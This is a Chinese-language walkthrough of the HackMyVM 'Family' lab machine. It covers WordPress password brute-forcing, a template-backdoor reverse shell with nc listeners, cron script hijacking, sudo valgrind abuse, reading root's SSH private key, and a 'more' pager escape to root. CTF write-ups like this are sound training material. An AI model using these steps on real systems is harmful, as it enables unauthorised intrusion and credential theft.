靶场学习 | 记一次对Family靶机的渗透测试

admin 2022年4月8日08:57:07评论75 views字数 2049阅读6分49秒阅读模式

靶机信息

靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Family

名称:(家庭)

难度:中等

创作者:cromiphi

发布日期:2021-04-30

目标:user.txt和falg.txt,root权限

搭建靶机

下载完Family.ova后,使用Oracle VM VirtualBox导入即可

导入时注意!!不要勾上USB控制器,不然会出错

导入完成后,直接启动即可,就可以开始靶机之旅

实验环境

攻击机:VMware      Kali    192.168.31.185
目标机:VirtualBox Debian IP自动获取

信息收集

扫描局域网内的靶机IP地址

nmap -sn 192.168.31.0/24

端口扫描,扫描目标机器所开放的服务

nmap -A -p- 192.168.31.214

扫描到22(SSH)、80(HTTP)两个端口,使用火狐浏览器访问80端口,http://192.168.2.214

是个wordpress,继续访问http://192.168.31.214/wordpress/,右击查看源码

本机加个family的hosts再继续访问

靶场学习 | 记一次对Family靶机的渗透测试

目录扫描,扫描一些敏感文件之类的,使用gobuster来扫描

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://family/wordpress/ -x html,php,txt -t 150

靶场学习 | 记一次对Family靶机的渗透测试

渗透测试

使用 wpscan 扫描 wordpress,没有发现可用的

wpscan --url http://family/wordpress/

使用 wpscan来爆破用户名

wpscan --url http://family/wordpress/ --enumerate u

发现一个admin

靶场学习 | 记一次对Family靶机的渗透测试

使用 wpscan来爆破admin用户的密码

wpscan --url http://family/wordpress/ -P /usr/share/wordlists/rockyou.txt -U admin

靶场学习 | 记一次对Family靶机的渗透测试

访问http://family/wordpress/wp-login.php,输入账号密码,登录后台

通过修改模板写入后门,访问文件即可获取反弹shell

靶场学习 | 记一次对Family靶机的渗透测试

访问404页面http://family/wordpress/wp-content/themes/twentytwentyone/404.php

新开一个终端页面开启监听

nc -lvnp 6666

靶场学习 | 记一次对Family靶机的渗透测试

检查home,发现有3个用户

靶场学习 | 记一次对Family靶机的渗透测试

继续寻找一些有用的资源,发现了father用户的密码

靶场学习 | 记一次对Family靶机的渗透测试

新开一个终端页面来登录father用户

ssh [email protected]
id
cd /home
ls -al

发现/home/mother 属于组father

靶场学习 | 记一次对Family靶机的渗透测试

上传pspy64来查看进程

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64
./pspy64

发现/bin/sh -c python ~/check.py每一分钟就执行一次

靶场学习 | 记一次对Family靶机的渗透测试

这样就可以在 /home/mother/check.py 中编写一些反向shell代码,等一分钟后就可以得到mother用户的反向shell

靶场学习 | 记一次对Family靶机的渗透测试

新开一个终端页面开启监听

nc -lvnp 5555

靶场学习 | 记一次对Family靶机的渗透测试

检查用户mother用户的权限,发现可以以用户baby运行二进制valgrind

sudo -l

靶场学习 | 记一次对Family靶机的渗透测试

执行以下命令,得到baby用户的shell

sudo -u baby valgrind /bin/bash
/bin/bash -i

靶场学习 | 记一次对Family靶机的渗透测试

拿到user.txt的flag

靶场学习 | 记一次对Family靶机的渗透测试

再次检查baby用户的权限

sudo -l

靶场学习 | 记一次对Family靶机的渗透测试

查看root的ssh密钥

sudo cat /root/.ssh/id_rsa

靶场学习 | 记一次对Family靶机的渗透测试

将ssh密钥保存下来,通过ssh密钥来提权

新开一个终端页面来登录root

chmod 600 id_rsa
ssh -i id_rsa [email protected]

靶场学习 | 记一次对Family靶机的渗透测试

发现一登录就会退出,因为 /root/.ssh/authorized_keys 执行 /root/troll.sh,它就会立即退出

靶场学习 | 记一次对Family靶机的渗透测试

现在要使shell代码不退出,需要将终端尺寸变小,使“more”无法显示全部信息再通过!/bin/bash来转义

ssh -i id_rsa [email protected]
!/bin/bash

靶场学习 | 记一次对Family靶机的渗透测试

成功获取到root权限,拿到flag

声明:请勿用作违法用途,请在授权情况下使用

往期精彩文章




内网渗透-信息收集方法总结
内网学习 | 记一次内网渗透靶场学习
Spring Cloud Function SPEL表达式注入漏洞复现
警惕Spring未知RCE0day Poc、exp钓鱼
2022DASCTF x SU 三月春季挑战赛 WP
靶场实战 | ATT&CK实战 Vulnstack 红队(三)


靶场学习 | 记一次对Family靶机的渗透测试
技术支持:白帽子社区团队
— 扫码关注我们 


原文始发于微信公众号(白帽子社区):靶场学习 | 记一次对Family靶机的渗透测试

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月8日08:57:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶场学习 | 记一次对Family靶机的渗透测试http://cn-sec.com/archives/882280.html

发表评论

匿名网友 填写信息